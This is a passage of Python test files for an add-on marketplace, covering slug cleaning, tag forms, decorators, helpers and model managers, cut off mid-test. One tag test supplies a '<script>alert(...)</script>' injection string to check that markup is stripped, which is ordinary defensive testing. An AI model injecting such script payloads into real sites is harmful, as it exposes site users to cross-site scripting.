    @mock.patch('files.models.File.mv')
    @mock.patch('files.models.storage')
    def test_move_disabled_file(self, m_storage, mv_mock):
        """Only the individually disabled file is moved, not its siblings."""
        Addon.objects.filter(id=self.addon.id).update(status=amo.STATUS_LITE)
        File.objects.filter(id=self.f1.id).update(status=amo.STATUS_DISABLED)
        File.objects.filter(id=self.f2.id).update(status=amo.STATUS_UNREVIEWED)
        cron.hide_disabled_files()
        # Only f1 should have been moved.
        f1 = self.f1
        mv_mock.assert_called_with(f1.file_path, f1.guarded_file_path,
                                   self.msg)
        eq_(mv_mock.call_count, 1)
    @mock.patch('files.models.File.mv')
    @mock.patch('files.models.storage')
    def test_ignore_deleted_versions(self, m_storage, mv_mock):
        """Files belonging to deleted versions are left alone."""
        # Apps only have 1 file and version delete only deletes one.
        self.f1.delete()
        self.version.delete()
        mv_mock.reset_mock()
        # Create a new version/file just like the one we deleted.
        version = Version.objects.create(addon=self.addon)
        File.objects.create(version=version, platform=self.p, filename='f2')
        cron.hide_disabled_files()
        # Mock shouldn't have been called.
        assert not mv_mock.called, mv_mock.call_args
########NEW FILE########
__FILENAME__ = test_decorators
from django import http
from django.core.exceptions import PermissionDenied
import mock
from nose.tools import eq_
from test_utils import RequestFactory
import amo.tests
from addons import decorators as dec
from addons.models import Addon
class TestAddonView(amo.tests.TestCase):
    """Tests for the addon_view decorator's slug/id resolution and redirects."""
    def setUp(self):
        self.addon = Addon.objects.create(slug='x', type=1)
        # The wrapped view is a mock; a successful dispatch returns the
        # sentinel so the tests can tell "view was called" from "redirected".
        self.func = mock.Mock()
        self.func.return_value = mock.sentinel.OK
        self.func.__name__ = 'mock_function'
        self.view = dec.addon_view(self.func)
        self.request = mock.Mock()
        self.slug_path = '/addon/%s/reviews' % self.addon.slug
        self.request.path = self.id_path = '/addon/%s/reviews' % self.addon.id
        self.request.GET = {}
    def test_301_by_id(self):
        """Hitting a URL by numeric id permanently redirects to the slug."""
        res = self.view(self.request, str(self.addon.id))
        self.assert3xx(res, self.slug_path, 301)
    def test_slug_replace_no_conflict(self):
        """Only the id path segment is rewritten, not id-prefixed lookalikes."""
        self.request.path = '/addon/{id}/reviews/{id}345/path'.format(
            id=self.addon.id)
        res = self.view(self.request, str(self.addon.id))
        self.assert3xx(res, '/addon/{slug}/reviews/{id}345/path'.format(
            id=self.addon.id, slug=self.addon.slug), 301)
    def test_301_with_querystring(self):
        """The query string survives the id-to-slug redirect."""
        self.request.GET = mock.Mock()
        self.request.GET.urlencode.return_value = 'q=1'
        res = self.view(self.request, str(self.addon.id))
        self.assert3xx(res, self.slug_path + '?q=1', 301)
    def test_200_by_slug(self):
        """A slug lookup dispatches straight to the wrapped view."""
        res = self.view(self.request, self.addon.slug)
        eq_(res, mock.sentinel.OK)
    def test_404_by_id(self):
        with self.assertRaises(http.Http404):
            self.view(self.request, str(self.addon.id * 2))
    def test_404_by_slug(self):
        with self.assertRaises(http.Http404):
            self.view(self.request, self.addon.slug + 'xx')
    def test_alternate_qs_301_by_id(self):
        """A custom queryset factory still supports the id redirect."""
        qs = lambda: Addon.objects.filter(type=1)
        view = dec.addon_view_factory(qs=qs)(self.func)
        res = view(self.request, str(self.addon.id))
        self.assert3xx(res, self.slug_path, 301)
    def test_alternate_qs_200_by_slug(self):
        qs = lambda: Addon.objects.filter(type=1)
        view = dec.addon_view_factory(qs=qs)(self.func)
        res = view(self.request, self.addon.slug)
        eq_(res, mock.sentinel.OK)
    def test_alternate_qs_404_by_id(self):
        # type=2 excludes our type=1 addon, so lookups must 404.
        qs = lambda: Addon.objects.filter(type=2)
        view = dec.addon_view_factory(qs=qs)(self.func)
        with self.assertRaises(http.Http404):
            view(self.request, str(self.addon.id))
    def test_alternate_qs_404_by_slug(self):
        qs = lambda: Addon.objects.filter(type=2)
        view = dec.addon_view_factory(qs=qs)(self.func)
        with self.assertRaises(http.Http404):
            view(self.request, self.addon.slug)
    def test_addon_no_slug(self):
        """An addon created without an explicit slug still resolves."""
        app = Addon.objects.create(type=1, name='xxxx')
        res = self.view(self.request, app.slug)
        eq_(res, mock.sentinel.OK)
    def test_slug_isdigit(self):
        """A purely numeric slug is treated as a slug, not as an id."""
        app = Addon.objects.create(type=1, name='xxxx')
        app.update(slug=str(app.id))
        r = self.view(self.request, app.slug)
        eq_(r, mock.sentinel.OK)
        request, addon = self.func.call_args[0]
        eq_(addon, app)
    def test_app(self):
        """Webapps resolve through app_slug and arrive typed as webapps."""
        app = amo.tests.app_factory(name='xxxx')
        app.update(slug=str(app.id) + 'foo', app_slug=str(app.id))
        res = self.view(self.request, app_slug=str(app.id))
        eq_(res, mock.sentinel.OK)
        eq_(self.func.call_args[0][1].type, amo.ADDON_WEBAPP)
class TestPremiumDecorators(amo.tests.TestCase):
    """Tests for the can_become_premium / has_purchased view decorators."""
    def setUp(self):
        # The addon is a plain mock; each test configures the one
        # predicate the decorator under test consults.
        self.addon = mock.Mock(pk=1)
        self.func = mock.Mock()
        self.func.return_value = True
        self.func.__name__ = 'mock_function'
        self.request = RequestFactory().get('/')
        self.request.amo_user = mock.Mock()
    def test_cant_become_premium(self):
        """Denied with PermissionDenied when the addon can't go premium."""
        self.addon.can_become_premium.return_value = False
        view = dec.can_become_premium(self.func)
        with self.assertRaises(PermissionDenied):
            view(self.request, self.addon.pk, self.addon)
    def test_can_become_premium(self):
        """Passes through to the wrapped view when allowed."""
        self.addon.can_become_premium.return_value = True
        view = dec.can_become_premium(self.func)
        eq_(view(self.request, self.addon.pk, self.addon), True)
    def test_has_purchased(self):
        """Premium addons the user purchased reach the wrapped view."""
        view = dec.has_purchased(self.func)
        self.addon.is_premium.return_value = True
        self.addon.has_purchased.return_value = True
        eq_(view(self.request, self.addon), True)
    def test_has_purchased_failure(self):
        """Premium addons the user has NOT purchased are denied."""
        view = dec.has_purchased(self.func)
        self.addon.is_premium.return_value = True
        self.addon.has_purchased.return_value = False
        with self.assertRaises(PermissionDenied):
            view(self.request, self.addon)
########NEW FILE########
__FILENAME__ = test_forms
# -*- coding: utf-8 -*-
import os
import tempfile
from mock import patch
from nose.tools import eq_
from django.conf import settings
from django.core.files.storage import default_storage as storage
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from amo.utils import rm_local_tmp_dir
from addons import forms
from addons.models import Addon, Category
from tags.models import Tag, AddonTag
from mkt.files.helpers import copyfileobj
class FormsTest(amo.tests.TestCase):
    """Tests for addon form validation: name uniqueness and slug rules."""
    fixtures = ('base/addon_3615', 'base/addon_3615_categories',
                'addons/blacklisted')
    def setUp(self):
        super(FormsTest, self).setUp()
        # 'Delicious Bookmarks' belongs to the addon_3615 fixture.
        self.existing_name = 'Delicious Bookmarks'
        self.non_existing_name = 'Does Not Exist'
        self.error_msg = 'This name is already in use. Please choose another.'
    def test_new(self):
        """
        New add-ons should be able to use non-existing add-on names.
        """
        f = forms.AddonForm(dict(name=self.non_existing_name))
        f.is_valid()
        eq_(f.errors.get('name'), None)
    def test_new_existing(self):
        """
        New add-ons shouldn't be able to use existing add-on names.
        """
        f = forms.AddonForm(dict(name=self.existing_name))
        assert not f.is_valid()
        eq_(f.errors['name'][0], self.error_msg)
    def test_old(self):
        """
        Existing add-ons shouldn't be able to use someone else's name.
        """
        a = Addon.objects.create(type=1)
        f = forms.AddonFormBasic(dict(name=self.existing_name), request=None,
                                 instance=a)
        assert not f.is_valid()
        # NOTE(review): the [0][1] indexing differs from test_new_existing's
        # errors['name'][0] — presumably AddonFormBasic name errors come as
        # (locale, message) pairs; verify against the form implementation.
        eq_(f.errors.get('name')[0][1], self.error_msg)
    def test_old_same(self):
        """
        Existing add-ons should be able to re-use their name.
        """
        delicious = Addon.objects.get()
        f = forms.AddonFormBasic(dict(name=self.existing_name), request=None,
                                 instance=delicious)
        f.is_valid()
        eq_(f.errors.get('name'), None)
    def test_locales(self):
        """The default_locale choices are sorted, starting at 'af'."""
        form = forms.AddonFormDetails(request={})
        eq_(form.fields['default_locale'].choices[0][0], 'af')
    def test_slug_blacklist(self):
        """Reserved words like 'submit' are rejected as slugs."""
        delicious = Addon.objects.get()
        form = forms.AddonFormBasic({'slug': 'submit'}, request=None,
                                    instance=delicious)
        assert not form.is_valid()
        eq_(form.errors['slug'],
            [u'The slug cannot be "submit". Please choose another.'])
    def test_slug_isdigit(self):
        """Purely numeric slugs are rejected (they'd clash with id URLs)."""
        delicious = Addon.objects.get()
        form = forms.AddonFormBasic({'slug': '123'}, request=None,
                                    instance=delicious)
        assert not form.is_valid()
        eq_(form.errors['slug'],
            [u'The slug cannot be "123". Please choose another.'])
class TestTagsForm(amo.tests.TestCase):
    """Tests for tag handling in AddonFormBasic: parsing, restrictions,
    limits and admin overrides."""
    fixtures = ['base/addon_3615', 'base/platforms', 'base/users']
    def setUp(self):
        self.addon = Addon.objects.get(pk=3615)
        category = Category.objects.get(pk=22)
        category.name = 'test'
        category.save()
        # Minimal valid form payload; individual tests add 'tags' to it.
        self.data = {
            'summary': str(self.addon.summary),
            'name': str(self.addon.name),
            'slug': self.addon.slug,
        }
        self.user = self.addon.authors.all()[0]
        amo.set_user(self.user)
    def add_tags(self, tags):
        """Helper: submit the form with `tags` and save it; must validate."""
        data = self.data.copy()
        data.update({'tags': tags})
        form = forms.AddonFormBasic(data=data, request=None,
                                    instance=self.addon)
        assert form.is_valid()
        form.save(self.addon)
        return form
    def get_tag_text(self):
        """Helper: current tag strings for the addon, bypassing the cache."""
        return [t.tag_text for t in self.addon.tags.no_cache().all()]
    def test_tags(self):
        self.add_tags('foo, bar')
        eq_(self.get_tag_text(), ['bar', 'foo'])
    def test_tags_xss(self):
        """Markup is stripped from tag text, not stored verbatim."""
        self.add_tags('<script>alert("foo")</script>, bar')
        eq_(self.get_tag_text(), ['bar', 'scriptalertfooscript'])
    def test_tags_case_spaces(self):
        """Tags are case-folded and whitespace-trimmed before dedup."""
        self.add_tags('foo, bar')
        self.add_tags('foo, bar , Bar, BAR, b a r ')
        eq_(self.get_tag_text(), ['b a r', 'bar', 'foo'])
    def test_tags_spaces(self):
        """Interior spaces within a tag are preserved."""
        self.add_tags('foo, bar beer')
        eq_(self.get_tag_text(), ['bar beer', 'foo'])
    def test_tags_unicode(self):
        """Non-ASCII tags are lowercased, not mangled."""
        self.add_tags(u'Österreich')
        eq_(self.get_tag_text(), [u'Österreich'.lower()])
    def add_restricted(self, *args):
        """Helper: attach restricted tags (default: 'restartless')."""
        if not args:
            args = ['restartless']
        for arg in args:
            tag = Tag.objects.create(tag_text=arg, restricted=True)
            AddonTag.objects.create(tag=tag, addon=self.addon)
    def test_tags_restricted(self):
        """Restricted tags are hidden from the form but kept on the addon."""
        self.add_restricted()
        self.add_tags('foo, bar')
        form = forms.AddonFormBasic(data=self.data, request=None,
                                    instance=self.addon)
        eq_(form.fields['tags'].initial, 'bar, foo')
        eq_(self.get_tag_text(), ['bar', 'foo', 'restartless'])
        self.add_tags('')
        eq_(self.get_tag_text(), ['restartless'])
    def test_tags_error(self):
        """Submitting reserved tags fails with singular/plural messages."""
        self.add_restricted('restartless', 'sdk')
        data = self.data.copy()
        data.update({'tags': 'restartless'})
        form = forms.AddonFormBasic(data=data, request=None,
                                    instance=self.addon)
        eq_(form.errors['tags'][0],
            '"restartless" is a reserved tag and cannot be used.')
        data.update({'tags': 'restartless, sdk'})
        form = forms.AddonFormBasic(data=data, request=None,
                                    instance=self.addon)
        eq_(form.errors['tags'][0],
            '"restartless", "sdk" are reserved tags and cannot be used.')
    @patch('access.acl.action_allowed')
    def test_tags_admin_restricted(self, action_allowed):
        """Admins (action_allowed forced True) may use restricted tags."""
        action_allowed.return_value = True
        self.add_restricted('restartless')
        self.add_tags('foo, bar')
        eq_(self.get_tag_text(), ['bar', 'foo'])
        self.add_tags('foo, bar, restartless')
        eq_(self.get_tag_text(), ['bar', 'foo', 'restartless'])
        form = forms.AddonFormBasic(data=self.data, request=None,
                                    instance=self.addon)
        eq_(form.fields['tags'].initial, 'bar, foo, restartless')
    @patch('access.acl.action_allowed')
    def test_tags_admin_restricted_count(self, action_allowed):
        # Only asserts via add_tags' form.is_valid(): the restricted tag
        # must not count against the admin's tag limit.
        action_allowed.return_value = True
        self.add_restricted()
        self.add_tags('restartless, %s' % (', '.join('tag-test-%s' %
                                                     i for i in range(0, 20))))
    def test_tags_restricted_count(self):
        # As above: existing restricted tags don't consume the user's quota.
        self.add_restricted()
        self.add_tags(', '.join('tag-test-%s' % i for i in range(0, 20)))
    def test_tags_slugified_count(self):
        """Duplicate tags collapse to one before the count limit applies."""
        self.add_tags(', '.join('tag-test' for i in range(0, 21)))
        eq_(self.get_tag_text(), ['tag-test'])
    def test_tags_limit(self):
        # 128 chars exactly (after trimming) is still accepted.
        self.add_tags(' %s' % ('t' * 128))
    def test_tags_long(self):
        """A tag over 128 chars after cleanup is rejected with a message."""
        tag = ' -%s' % ('t' * 128)
        data = self.data.copy()
        data.update({"tags": tag})
        form = forms.AddonFormBasic(data=data, request=None,
                                    instance=self.addon)
        assert not form.is_valid()
        eq_(form.errors['tags'], ['All tags must be 128 characters or less'
                                  ' after invalid characters are removed.'])
class TestIconForm(amo.tests.TestCase):
    """Tests for icon handling in AddonFormMedia."""
    fixtures = ['base/addon_3615']
    # TODO: AddonFormMedia save() method could do with cleaning up
    # so this isn't necessary
    def setUp(self):
        self.temp_dir = tempfile.mkdtemp()
        self.addon = Addon.objects.get(pk=3615)
        class DummyRequest:
            # AddonFormMedia only reads request.FILES.
            FILES = None
        self.request = DummyRequest()
        # Shared tmp directory where uploaded icons are staged.
        self.icon_path = os.path.join(settings.TMP_PATH, 'icon')
        if not os.path.exists(self.icon_path):
            os.makedirs(self.icon_path)
    def tearDown(self):
        rm_local_tmp_dir(self.temp_dir)
    def get_icon_paths(self):
        """Return the expected on-disk path for every generated icon size."""
        path = os.path.join(self.addon.get_icon_dir(), str(self.addon.id))
        return ['%s-%s.png' % (path, size) for size in amo.ADDON_ICON_SIZES]
    @patch('apps.addons.models.Addon.get_icon_dir')
    def testIconUpload(self, get_icon_dir):
        # TODO(gkoberger): clarify this please.
        # We no longer use AddonFormMedia to upload icons, so
        # skipping until I can ask andym what the point of this
        # test is. Additionally, it's called "TestIconRemoval",
        # but it doesn't seem to remove icons.
        return
        # NOTE(review): everything below the return is dead code kept
        # for reference until the TODO above is resolved.
        get_icon_dir.return_value = self.temp_dir
        for path in self.get_icon_paths():
            assert not os.path.exists(path)
        img = get_image_path('non-animated.png')
        data = {'icon_upload': img, 'icon_type': 'text/png'}
        self.request.FILES = {'icon_upload': open(img)}
        form = forms.AddonFormMedia(data=data, request=self.request,
                                    instance=self.addon)
        assert form.is_valid()
        form.save(self.addon)
        for path in self.get_icon_paths():
            assert os.path.exists(path)
    @patch('amo.models.ModelBase.update')
    def test_icon_modified(self, update_mock):
        """Saving an icon_upload_hash triggers ModelBase.update (and thus
        a fresh modified timestamp) on the addon."""
        name = 'transparent.png'
        form = forms.AddonFormMedia({'icon_upload_hash': name},
                                    request=self.request,
                                    instance=self.addon)
        dest = os.path.join(self.icon_path, name)
        # Fix: the original leaked the open() handle on the source image;
        # close both source and destination deterministically.
        with open(get_image_path(name)) as src:
            with storage.open(dest, 'w') as f:
                copyfileobj(src, f)
        assert form.is_valid()
        form.save(addon=self.addon)
        assert update_mock.called
class TestCategoryForm(amo.tests.TestCase):
    """Tests for CategoryFormSet construction per application."""
    fixtures = ['base/apps']
    def test_no_possible_categories(self):
        """Only apps that actually have categories for the addon's type
        get a form in the formset (here: just Firefox)."""
        Category.objects.create(type=amo.ADDON_SEARCH,
                                application_id=amo.FIREFOX.id)
        addon = Addon.objects.create(type=amo.ADDON_SEARCH)
        form = forms.CategoryFormSet(addon=addon)
        apps = [f.app for f in form.forms]
        eq_(apps, [amo.FIREFOX])
########NEW FILE########
__FILENAME__ = test_helpers
from mock import Mock
from nose.tools import eq_
from pyquery import PyQuery
import amo
import amo.tests
from addons.helpers import contribution, flag, statusflags
from addons.models import Addon
class TestHelpers(amo.tests.TestCase):
    """Tests for the addon template helpers: statusflags, flag and the
    contribution box."""
    fixtures = ['base/addon_3615', 'base/users',
                'addons/featured', 'base/collections',
                'base/featured']
    def test_statusflags(self):
        ctx = {'APP': amo.FIREFOX, 'LANG': 'en-US'}
        # unreviewed
        a = Addon(status=amo.STATUS_UNREVIEWED)
        eq_(statusflags(ctx, a), 'unreviewed')
        # recommended
        featured = Addon.objects.get(pk=1003)
        eq_(statusflags(ctx, featured), 'featuredaddon')
        # category featured
        featured = Addon.objects.get(pk=1001)
        eq_(statusflags(ctx, featured), 'featuredaddon')
    def test_flags(self):
        ctx = {'APP': amo.FIREFOX, 'LANG': 'en-US'}
        # unreviewed
        a = Addon(status=amo.STATUS_UNREVIEWED)
        eq_(flag(ctx, a), '<h5 class="flag">Not Reviewed</h5>')
        # recommended
        featured = Addon.objects.get(pk=1003)
        eq_(flag(ctx, featured), '<h5 class="flag">Featured</h5>')
        # category featured
        featured = Addon.objects.get(pk=1001)
        eq_(flag(ctx, featured), '<h5 class="flag">Featured</h5>')
    def test_contribution_box(self):
        a = Addon.objects.get(pk=7661)
        a.suggested_amount = '12'
        settings = Mock()
        settings.MAX_CONTRIBUTION = 5
        request = Mock()
        request.GET = {'src': 'direct'}
        c = {'LANG': 'en-us', 'APP': amo.FIREFOX, 'settings': settings,
             'request': request}
        s = contribution(c, a)
        doc = PyQuery(s)
        # make sure input boxes are rendered correctly (bug 555867)
        assert doc('input[name=onetime-amount]').length == 1
    def test_src_retained(self):
        """The contribution_src argument ends up in the hidden source input."""
        a = Addon.objects.get(pk=7661)
        a.suggested_amount = '12'
        settings = Mock()
        settings.MAX_CONTRIBUTION = 5
        request = Mock()
        c = {'LANG': 'en-us', 'APP': amo.FIREFOX, 'settings': settings,
             'request': request}
        s = contribution(c, a, contribution_src='browse')
        doc = PyQuery(s)
        eq_(doc('input[name=source]').attr('value'), 'browse')
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import json
import os
import tempfile
import time
from contextlib import nested
from datetime import datetime, timedelta
from urlparse import urlparse
from django import forms
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core import mail
from django.core.exceptions import ValidationError
from django.utils import translation
from mock import Mock, patch
from nose.tools import assert_not_equal, eq_, raises
import amo
import amo.tests
from addons.models import (Addon, AddonCategory, AddonDeviceType, AddonType,
AddonUpsell, AddonUser, AppSupport, BlacklistedSlug,
Category, Preview)
from amo import set_user
from amo.helpers import absolutify
from amo.signals import _connect, _disconnect
from applications.models import Application, AppVersion
from constants.applications import DEVICE_TYPES
from devhub.models import ActivityLog
from editors.models import EscalationQueue
from files.models import File, Platform
from files.tests.test_models import UploadTest
from reviews.models import Review
from translations.models import Translation, TranslationSequence
from users.models import UserProfile
from versions.compare import version_int
from versions.models import ApplicationsVersions, Version
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPaymentData, AddonPremium, Price
class TestCleanSlug(amo.tests.TestCase):
    """Tests for Addon.clean_slug: uniqueness suffixes, id fallbacks,
    blacklists, slugification and length limits."""
    def test_clean_slug_new_object(self):
        # Make sure there's at least an addon with the "addon" slug, subsequent
        # ones should be "addon-1", "addon-2" ...
        a = Addon.objects.create()
        eq_(a.slug, "addon")
        # Start with a first clash. This should give us "addon-1".
        # We're not saving yet, we're testing the slug creation without an id.
        b = Addon()
        b.clean_slug()
        eq_(b.slug, 'addon-1')
        # Now save the instance to the database for future clashes.
        b.save()
        # Test on another object without an id.
        c = Addon()
        c.clean_slug()
        eq_(c.slug, 'addon-2')
        # Even if an addon is deleted, don't clash with its slug.
        c.status = amo.STATUS_DELETED
        # Now save the instance to the database for future clashes.
        c.save()
        # And yet another object without an id. Make sure we're not trying to
        # assign the 'addon-2' slug from the deleted addon.
        d = Addon()
        d.clean_slug()
        eq_(d.slug, 'addon-3')
    def test_clean_slug_with_id(self):
        """With no name and no slug, the slug is derived from the id."""
        # Create an addon and save it to have an id.
        a = Addon.objects.create()
        # Start over: don't use the name nor the id to generate the slug.
        a.slug = a.name = ""
        a.clean_slug()
        # Slugs created from an id are of the form "id~", eg "123~" to avoid
        # clashing with URLs.
        eq_(a.slug, "%s~" % a.id)
        # And again, this time make it clash.
        b = Addon.objects.create()
        # Set a's slug to be what should be created for b from its id.
        a.slug = "%s~" % b.id
        a.save()
        # Now start over for b.
        b.slug = b.name = ""
        b.clean_slug()
        eq_(b.slug, "%s~-1" % b.id)
    def test_clean_slug_with_name(self):
        # Make sure there's at least an addon with the "fooname" slug,
        # subsequent ones should be "fooname-1", "fooname-2" ...
        a = Addon.objects.create(name="fooname")
        eq_(a.slug, "fooname")
        b = Addon(name="fooname")
        b.clean_slug()
        eq_(b.slug, "fooname-1")
    def test_clean_slug_with_slug(self):
        # Make sure there's at least an addon with the "fooslug" slug,
        # subsequent ones should be "fooslug-1", "fooslug-2" ...
        a = Addon.objects.create(name="fooslug")
        eq_(a.slug, "fooslug")
        b = Addon(name="fooslug")
        b.clean_slug()
        eq_(b.slug, "fooslug-1")
    def test_clean_slug_blacklisted_slug(self):
        blacklisted_slug = 'fooblacklisted'
        BlacklistedSlug.objects.create(name=blacklisted_slug)
        a = Addon(slug=blacklisted_slug)
        a.clean_slug()
        # Blacklisted slugs (like "activate" or IDs) have a "~" appended to
        # avoid clashing with URLs.
        eq_(a.slug, "%s~" % blacklisted_slug)
        # Now save the instance to the database for future clashes.
        a.save()
        b = Addon(slug=blacklisted_slug)
        b.clean_slug()
        eq_(b.slug, "%s~-1" % blacklisted_slug)
    def test_clean_slug_blacklisted_slug_long_slug(self):
        """The "~" suffix still fits within the 30-char slug limit."""
        long_slug = "this_is_a_very_long_slug_that_is_longer_than_thirty_chars"
        BlacklistedSlug.objects.create(name=long_slug[:30])
        # If there's no clashing slug, just append a "~".
        a = Addon.objects.create(slug=long_slug[:30])
        eq_(a.slug, "%s~" % long_slug[:29])
        # If there's a clash, use the standard clash resolution.
        a = Addon.objects.create(slug=long_slug[:30])
        eq_(a.slug, "%s-1" % long_slug[:27])
    def test_clean_slug_long_slug(self):
        long_slug = "this_is_a_very_long_slug_that_is_longer_than_thirty_chars"
        # If there's no clashing slug, don't over-shorten it.
        a = Addon.objects.create(slug=long_slug)
        eq_(a.slug, long_slug[:30])
        # Now that there is a clash, test the clash resolution.
        b = Addon(slug=long_slug)
        b.clean_slug()
        eq_(b.slug, "%s-1" % long_slug[:27])
    def test_clean_slug_always_slugify(self):
        illegal_chars = "some spaces and !?@"
        # Slugify if there's a slug provided.
        a = Addon(slug=illegal_chars)
        a.clean_slug()
        assert a.slug.startswith("some-spaces-and"), a.slug
        # Also slugify if there's no slug provided.
        b = Addon(name=illegal_chars)
        b.clean_slug()
        assert b.slug.startswith("some-spaces-and"), b.slug
    def test_clean_slug_worst_case_scenario(self):
        long_slug = "this_is_a_very_long_slug_that_is_longer_than_thirty_chars"
        # Generate 100 addons with this very long slug. We should encounter the
        # worst case scenario where all the available clashes have been
        # avoided. Check the comment in addons.models.clean_slug, in the "else"
        # part of the "for" loop checking for available slugs not yet assigned.
        for i in range(100):
            Addon.objects.create(slug=long_slug)
        with self.assertRaises(RuntimeError):  # Fail on the 100th clash.
            Addon.objects.create(slug=long_slug)
class TestAddonManager(amo.tests.TestCase):
    """Tests for the Addon manager's query helpers: featured, listed,
    public/reviewed/valid filters and the top_free/top_paid rankings."""
    fixtures = ['base/apps', 'base/appversion', 'base/users',
                'base/addon_3615', 'addons/featured', 'addons/test_manager',
                'base/collections', 'base/featured',
                'base/addon_5299_gcal']
    def setUp(self):
        # Clear any thread-local user so ActivityLog isn't attributed.
        set_user(None)
    def test_featured(self):
        eq_(Addon.objects.featured(amo.FIREFOX).count(), 3)
    def test_listed(self):
        """listed() respects status, disabled_by_user and file presence."""
        # We need this for the fixtures, but it messes up the tests.
        Addon.objects.get(pk=3615).update(disabled_by_user=True)
        # Now continue as normal.
        Addon.objects.filter(id=5299).update(disabled_by_user=True)
        q = Addon.objects.listed(amo.FIREFOX, amo.STATUS_PUBLIC)
        eq_(len(q.all()), 4)
        addon = q[0]
        eq_(addon.id, 2464)
        # Disabling hides it.
        addon.disabled_by_user = True
        addon.save()
        # Should be 3 now, since the one is now disabled.
        eq_(q.count(), 3)
        # If we search for public or unreviewed we find it.
        addon.disabled_by_user = False
        addon.status = amo.STATUS_UNREVIEWED
        addon.save()
        eq_(q.count(), 3)
        eq_(Addon.objects.listed(amo.FIREFOX, amo.STATUS_PUBLIC,
                                 amo.STATUS_UNREVIEWED).count(), 4)
        # Can't find it without a file.
        addon.versions.get().files.get().delete()
        eq_(q.count(), 3)
    def test_public(self):
        public = Addon.objects.public()
        for a in public:
            assert_not_equal(
                a.id, 3, 'public() must not return unreviewed add-ons')
    def test_reviewed(self):
        """reviewed() only yields addons in a reviewed status."""
        for a in Addon.objects.reviewed():
            assert a.status in amo.REVIEWED_STATUSES, (a.id, a.status)
    def test_unreviewed(self):
        """
        Tests for unreviewed addons.
        """
        exp = Addon.objects.unreviewed()
        for addon in exp:
            assert addon.status in amo.UNREVIEWED_STATUSES, (
                'unreviewed() must return unreviewed addons.')
    def test_valid(self):
        """valid() excludes user-disabled addons and unlisted statuses."""
        addon = Addon.objects.get(pk=5299)
        addon.update(disabled_by_user=True)
        objs = Addon.objects.valid()
        for addon in objs:
            assert addon.status in amo.LISTED_STATUSES
            assert not addon.disabled_by_user
    def test_top_free_public(self):
        """top_free ranks listed free addons by weekly downloads."""
        addons = list(Addon.objects.listed(amo.FIREFOX))
        eq_(list(Addon.objects.top_free(amo.FIREFOX)),
            sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
        eq_(list(Addon.objects.top_free(amo.THUNDERBIRD)), [])
    def test_top_free_all(self):
        """With listed=False, top_free covers any supported free addon."""
        addons = list(Addon.objects.filter(appsupport__app=amo.FIREFOX.id)
                      .exclude(premium_type__in=amo.ADDON_PREMIUMS)
                      .exclude(addonpremium__price__price__isnull=False))
        eq_(list(Addon.objects.top_free(amo.FIREFOX, listed=False)),
            sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
        eq_(list(Addon.objects.top_free(amo.THUNDERBIRD, listed=False)), [])
    def make_paid(self, addons, type=amo.ADDON_PREMIUM):
        """Helper: turn `addons` premium with a shared $1.00 price tier."""
        price = Price.objects.create(price='1.00')
        for addon in addons:
            addon.update(premium_type=type)
            AddonPremium.objects.create(addon=addon, price=price)
    def test_top_paid_public(self):
        addons = list(Addon.objects.listed(amo.FIREFOX)[:3])
        self.make_paid(addons)
        eq_(list(Addon.objects.top_paid(amo.FIREFOX)),
            sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
        eq_(list(Addon.objects.top_paid(amo.THUNDERBIRD)), [])
    def test_top_paid_all(self):
        addons = list(Addon.objects.listed(amo.FIREFOX)[:3])
        for addon in addons:
            addon.update(status=amo.STATUS_LITE)
        self.make_paid(addons)
        eq_(list(Addon.objects.top_paid(amo.FIREFOX, listed=False)),
            sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
        eq_(list(Addon.objects.top_paid(amo.THUNDERBIRD, listed=False)), [])
    def test_top_paid_in_app_all(self):
        """In-app-premium addons rank in top_paid too."""
        addons = list(Addon.objects.listed(amo.FIREFOX)[:3])
        for addon in addons:
            addon.update(status=amo.STATUS_LITE)
        self.make_paid(addons, amo.ADDON_PREMIUM_INAPP)
        eq_(list(Addon.objects.top_paid(amo.FIREFOX, listed=False)),
            sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
        eq_(list(Addon.objects.top_paid(amo.THUNDERBIRD, listed=False)), [])
    def test_new_featured(self):
        f = Addon.objects.featured(amo.FIREFOX)
        eq_(f.count(), 3)
        eq_(sorted(x.id for x in f),
            [2464, 7661, 15679])
        f = Addon.objects.featured(amo.THUNDERBIRD)
        assert not f.exists()
class TestNewAddonVsWebapp(amo.tests.TestCase):
    """Addon's type-based polymorphism: ADDON_WEBAPP rows materialize as
    Webapp instances, both on construction and on DB fetch."""
    def test_addon_from_kwargs(self):
        a = Addon(type=amo.ADDON_EXTENSION)
        assert isinstance(a, Addon)
    def test_webapp_from_kwargs(self):
        w = Addon(type=amo.ADDON_WEBAPP)
        assert isinstance(w, Webapp)
    def test_addon_from_db(self):
        a = Addon.objects.create(type=amo.ADDON_EXTENSION)
        assert isinstance(a, Addon)
        assert isinstance(Addon.objects.get(id=a.id), Addon)
    def test_webapp_from_db(self):
        a = Addon.objects.create(type=amo.ADDON_WEBAPP)
        assert isinstance(a, Webapp)
        assert isinstance(Addon.objects.get(id=a.id), Webapp)
class TestAddonModels(amo.tests.TestCase):
fixtures = ['base/apps',
'base/appversion',
'base/collections',
'base/featured',
'base/platforms',
'base/users',
'base/addon_5299_gcal',
'base/addon_3615',
'base/addon_3723_listed',
'base/addon_6704_grapple.json',
'base/addon_4594_a9',
'base/addon_4664_twitterbar',
'base/thunderbird',
'addons/featured',
'addons/invalid_latest_version',
'addons/blacklisted']
    def setUp(self):
        """Pin amo.FIREFOX.latest_version so compat lookups are stable."""
        # Reserve a translation sequence id the fixtures rely on.
        TranslationSequence.objects.create(id=99243)
        # TODO(andym): use Mock appropriately here.
        self.old_version = amo.FIREFOX.latest_version
        amo.FIREFOX.latest_version = '3.6.15'
    def tearDown(self):
        # Undo the monkey-patch from setUp.
        amo.FIREFOX.latest_version = self.old_version
    def test_current_version(self):
        """
        Tests that we get the current (latest public) version of an addon.
        """
        a = Addon.objects.get(pk=3615)
        # 81551 comes from the base/addon_3615 fixture.
        eq_(a.current_version.id, 81551)
    def test_current_version_listed(self):
        """A listed addon (fixture 3723) exposes its current version."""
        a = Addon.objects.get(pk=3723)
        eq_(a.current_version.id, 89774)
    def test_current_version_listed_no_version(self):
